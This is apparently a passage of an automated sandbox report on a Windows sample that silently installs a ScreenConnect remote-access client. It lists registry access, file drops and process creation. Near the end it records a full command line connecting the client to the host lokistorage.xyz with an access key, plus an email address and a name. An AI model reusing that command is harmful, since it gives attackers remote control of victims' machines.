                              Source: rundll32.exe, 00000005.00000003.2221560120.0000000004ABA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2221560120.0000000004B2B000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr, Microsoft.Deployment.WindowsInstaller.dll.5.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.5.drString found in binary or memory: http://wixtoolset.org/news/
                              Source: rundll32.exe, 00000005.00000003.2221560120.0000000004ABA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2221560120.0000000004B2B000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr, Microsoft.Deployment.WindowsInstaller.dll.5.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.5.drString found in binary or memory: http://wixtoolset.org/releases/
                              Source: lat0Kwfbuj.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://www.digicert.com/CPS0
                              Source: ScreenConnect.WindowsCredentialProvider.dll.3.drString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
                              Source: ScreenConnect.Core.dll.3.drString found in binary or memory: https://feedback.screenconnect.com/Feedback.axd

                              Spam, unwanted Advertisements and Ransom Demands

                              barindex
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnectJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior

                              System Summary

                              barindex
                              Source: lat0Kwfbuj.exePE Siganture Subject Chain: CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeCode function: 8_2_05EF28B0 CreateProcessAsUserW,8_2_05EF28B0
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\488619.msiJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{C1B3422C-ACE2-80E9-5511-BBBA7971CBA6}Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI884C.tmpJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI888B.tmpJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI8C55.tmpJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\48861b.msiJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\48861b.msiJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{C1B3422C-ACE2-80E9-5511-BBBA7971CBA6}Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{C1B3422C-ACE2-80E9-5511-BBBA7971CBA6}\DefaultIconJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\Installer\wix{C1B3422C-ACE2-80E9-5511-BBBA7971CBA6}.SchedServiceConfig.rmiJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (20ae101cef0f1acf)Jump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (20ae101cef0f1acf)\fobt51ho.tmpJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (20ae101cef0f1acf)\fobt51ho.newcfgJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.logJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSI888B.tmpJump to behavior
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeCode function: 0_2_055EEC600_2_055EEC60
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeCode function: 0_2_055E9C900_2_055E9C90
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeCode function: 0_2_055E6AB80_2_055E6AB8
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeCode function: 0_2_055E60800_2_055E6080
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeCode function: 0_2_055E6AA80_2_055E6AA8
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeCode function: 8_2_014FD5988_2_014FD598
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeCode function: 8_2_05EF00408_2_05EF0040
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeCode function: 8_2_05EF00408_2_05EF0040
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD340C06D39_2_00007FFD340C06D3
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD340BECED9_2_00007FFD340BECED
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD340BDCF29_2_00007FFD340BDCF2
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD340BED2D9_2_00007FFD340BED2D
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD340B703D9_2_00007FFD340B703D
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD340DEFA09_2_00007FFD340DEFA0
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD340D99149_2_00007FFD340D9914
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD340E340D9_2_00007FFD340E340D
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD340DECA59_2_00007FFD340DECA5
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD340E0CFA9_2_00007FFD340E0CFA
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD340D9D509_2_00007FFD340D9D50
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD340DEDD39_2_00007FFD340DEDD3
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD340E95CD9_2_00007FFD340E95CD
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD340DDDDD9_2_00007FFD340DDDDD
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD340E96709_2_00007FFD340E9670
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD340E76689_2_00007FFD340E7668
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD340E47159_2_00007FFD340E4715
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD340DEB119_2_00007FFD340DEB11
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD340E03FA9_2_00007FFD340E03FA
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD340EF4589_2_00007FFD340EF458
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD343C5CB69_2_00007FFD343C5CB6
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD343C6ED39_2_00007FFD343C6ED3
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD343C03399_2_00007FFD343C0339
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD343C13139_2_00007FFD343C1313
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD343C639B9_2_00007FFD343C639B
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFD340BBCD310_2_00007FFD340BBCD3
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFD340C06D310_2_00007FFD340C06D3
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFD340B703D10_2_00007FFD340B703D
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFD340C22CD10_2_00007FFD340C22CD
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFD340B74C810_2_00007FFD340B74C8
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFD340BECED10_2_00007FFD340BECED
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFD340BDCF210_2_00007FFD340BDCF2
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFD340BED2D10_2_00007FFD340BED2D
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFD343C30BC10_2_00007FFD343C30BC
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFD343C606810_2_00007FFD343C6068
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFD343CF17210_2_00007FFD343CF172
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFD343CE3C610_2_00007FFD343CE3C6
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFD343C079010_2_00007FFD343C0790
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFD343D04FA10_2_00007FFD343D04FA
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFD343D051810_2_00007FFD343D0518
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFD343D05FA10_2_00007FFD343D05FA
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFD343CC3D510_2_00007FFD343CC3D5
                              Source: lat0Kwfbuj.exeStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                              Source: lat0Kwfbuj.exeStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                              Source: lat0Kwfbuj.exeStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                              Source: lat0Kwfbuj.exeStatic PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Source: lat0Kwfbuj.exeStatic PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Source: lat0Kwfbuj.exe, 00000000.00000002.2220231387.0000000005390000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs lat0Kwfbuj.exe
                              Source: lat0Kwfbuj.exe, 00000000.00000000.2196973260.0000000000F16000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs lat0Kwfbuj.exe
                              Source: lat0Kwfbuj.exe, 00000000.00000000.2196973260.0000000000F16000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSfxCA.dllL vs lat0Kwfbuj.exe
                              Source: lat0Kwfbuj.exe, 00000000.00000000.2196973260.0000000000F16000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamewixca.dll\ vs lat0Kwfbuj.exe
                              Source: lat0Kwfbuj.exe, 00000000.00000000.2196973260.0000000000F16000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs lat0Kwfbuj.exe
                              Source: lat0Kwfbuj.exe, 00000000.00000000.2196973260.0000000000F16000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameDotNetResolver.exe4 vs lat0Kwfbuj.exe
                              Source: lat0Kwfbuj.exe, 00000000.00000002.2220341691.00000000053B0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamelibwebp.dllB vs lat0Kwfbuj.exe
                              Source: lat0Kwfbuj.exe, 00000000.00000002.2220341691.00000000053B0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamezlib.dll2 vs lat0Kwfbuj.exe
                              Source: lat0Kwfbuj.exe, 00000000.00000002.2220341691.00000000053B0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs lat0Kwfbuj.exe
                              Source: lat0Kwfbuj.exe, 00000000.00000002.2207194504.0000000001350000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameDotNetResolver.exe4 vs lat0Kwfbuj.exe
                              Source: lat0Kwfbuj.exe, 00000000.00000002.2231543469.00000000079D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs lat0Kwfbuj.exe
                              Source: lat0Kwfbuj.exe, 00000000.00000002.2231543469.00000000079D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSfxCA.dllL vs lat0Kwfbuj.exe
                              Source: lat0Kwfbuj.exe, 00000000.00000002.2231543469.00000000079D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewixca.dll\ vs lat0Kwfbuj.exe
                              Source: lat0Kwfbuj.exe, 00000000.00000002.2253146770.000000000B9F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsiexec.exe.muiX vs lat0Kwfbuj.exe
                              Source: lat0Kwfbuj.exe, 00000000.00000002.2219493437.0000000005300000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.Core.dll< vs lat0Kwfbuj.exe
                              Source: lat0Kwfbuj.exe, 00000000.00000000.2196973260.0000000000B16000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.Core.dll< vs lat0Kwfbuj.exe
                              Source: lat0Kwfbuj.exe, 00000000.00000000.2196973260.0000000000B16000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamelibwebp.dllB vs lat0Kwfbuj.exe
                              Source: lat0Kwfbuj.exe, 00000000.00000000.2196973260.0000000000B16000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamezlib.dll2 vs lat0Kwfbuj.exe
                              Source: lat0Kwfbuj.exe, 00000000.00000000.2196973260.0000000000B16000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs lat0Kwfbuj.exe
                              Source: lat0Kwfbuj.exe, 00000000.00000000.2196973260.0000000000B16000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs lat0Kwfbuj.exe
                              Source: lat0Kwfbuj.exe, 00000000.00000002.2222155530.00000000057BB000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs lat0Kwfbuj.exe
                              Source: lat0Kwfbuj.exe, 00000000.00000002.2222155530.00000000057BB000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSfxCA.dllL vs lat0Kwfbuj.exe
                              Source: lat0Kwfbuj.exe, 00000000.00000002.2222155530.00000000057BB000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamewixca.dll\ vs lat0Kwfbuj.exe
                              Source: lat0Kwfbuj.exe, 00000000.00000002.2222155530.00000000057BB000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs lat0Kwfbuj.exe
                              Source: lat0Kwfbuj.exe, 00000000.00000002.2217758260.0000000003E23000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs lat0Kwfbuj.exe
                              Source: lat0Kwfbuj.exeBinary or memory string: OriginalFilenameScreenConnect.Core.dll< vs lat0Kwfbuj.exe
                              Source: lat0Kwfbuj.exeBinary or memory string: OriginalFilenamelibwebp.dllB vs lat0Kwfbuj.exe
                              Source: lat0Kwfbuj.exeBinary or memory string: OriginalFilenamezlib.dll2 vs lat0Kwfbuj.exe
                              Source: lat0Kwfbuj.exeBinary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs lat0Kwfbuj.exe
                              Source: lat0Kwfbuj.exeBinary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs lat0Kwfbuj.exe
                              Source: lat0Kwfbuj.exeBinary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs lat0Kwfbuj.exe
                              Source: lat0Kwfbuj.exeBinary or memory string: OriginalFilenameSfxCA.dllL vs lat0Kwfbuj.exe
                              Source: lat0Kwfbuj.exeBinary or memory string: OriginalFilenamewixca.dll\ vs lat0Kwfbuj.exe
                              Source: lat0Kwfbuj.exeBinary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs lat0Kwfbuj.exe
                              Source: lat0Kwfbuj.exeBinary or memory string: OriginalFilenameDotNetResolver.exe4 vs lat0Kwfbuj.exe
                              Source: lat0Kwfbuj.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                              Source: 0.2.lat0Kwfbuj.exe.53b0000.3.raw.unpack, WindowsToolkit.csCryptographic APIs: 'CreateDecryptor'
                              Source: 0.0.lat0Kwfbuj.exe.b9b9d4.3.raw.unpack, WindowsToolkit.csCryptographic APIs: 'CreateDecryptor'
                              Source: 0.0.lat0Kwfbuj.exe.b163d4.5.raw.unpack, CursorBuffer.csCryptographic APIs: 'TransformBlock'
                              Source: 0.2.lat0Kwfbuj.exe.5300000.1.raw.unpack, CursorBuffer.csCryptographic APIs: 'TransformBlock'
                              Source: 0.2.lat0Kwfbuj.exe.53b0000.3.raw.unpack, WindowsExtensions.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                              Source: 0.2.lat0Kwfbuj.exe.53b0000.3.raw.unpack, WindowsExtensions.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                              Source: 0.2.lat0Kwfbuj.exe.53b0000.3.raw.unpack, WindowsExtensions.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                              Source: 0.0.lat0Kwfbuj.exe.b9b9d4.3.raw.unpack, WindowsExtensions.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                              Source: 0.0.lat0Kwfbuj.exe.b9b9d4.3.raw.unpack, WindowsExtensions.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                              Source: 0.0.lat0Kwfbuj.exe.b9b9d4.3.raw.unpack, WindowsExtensions.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                              Source: classification engineClassification label: mal50.troj.evad.winEXE@17/64@1/1
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)Jump to behavior
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\lat0Kwfbuj.exe.logJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeMutant created: NULL
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeMutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeFile created: C:\Users\user\AppData\Local\Temp\ScreenConnectJump to behavior
                              Source: lat0Kwfbuj.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: lat0Kwfbuj.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI805D.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4752015 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                              Source: lat0Kwfbuj.exeReversingLabs: Detection: 21%
                              Source: lat0Kwfbuj.exeString found in binary or memory: $F294ACFC-3146-4483-A7BF-ADDCA7C260E2
                              Source: lat0Kwfbuj.exeString found in binary or memory: $F294ACFC-3146-4483-A7BF-ADDCA7C260E2)
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeFile read: C:\Users\user\Desktop\lat0Kwfbuj.exeJump to behavior
                              Source: unknownProcess created: C:\Users\user\Desktop\lat0Kwfbuj.exe "C:\Users\user\Desktop\lat0Kwfbuj.exe"
                              Source: C:\Users\user\Desktop\lat0Kwfbuj.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\20ae101cef0f1acf\setup.msi"
                              Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding AEF3BD45AE3AC68FA3C1F0BB226B94AD C
                              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI805D.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4752015 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 1AEB7D6AE800B379962CD8E66BA70200
                              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 297D060039D81CAE5710DC99E60A4A0C E Global\MSI0000
                              Source: unknownProcess created: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe "C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=lokistorage.xyz&p=8041&s=8c30d271-264f-488c-94af-041784a36368&k=BgIAAACkAABSU0ExAAgAAAEAAQChADX0VDCOYpzw3rHL2%2fWsmDfp2rMCOwlBz1eCGgD2Oi1gRuiacwZcRKSZxBYWgdfGxDbYoeGqdwtpMoqlG8JOF4ZKxVYt9zhvvQIB5ire7%2fRFo81g3%2b6hxkPJc0INqs%2bXruwq1z%2b6smxQSCBb%2fykHDHW7AhbHyK65sNB5aK02%2bPswsU904ncQII1vFx60s4CJ8ilr9kIfJWyMgG0RDnaKSCV6gAU5oDSV8wZ3CFUrC2FZNJ8A0Fkfb5xYiK39FBIivzP4vYfAruNnluqWCCrM3hrKooHc9G96dlUI6y4avh5vYzfNXEaIxQvrLqzjTpAdRhiVwzF5SgOywQIOk%2bC5&t=michalgasper2%40gmail.com&c=kristof%20horvat&c=&c=&c=&c=&c=&c=&c="
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe" "RunRole" "b15bf990-c25d-4951-af9a-ebda90b58672" "User"
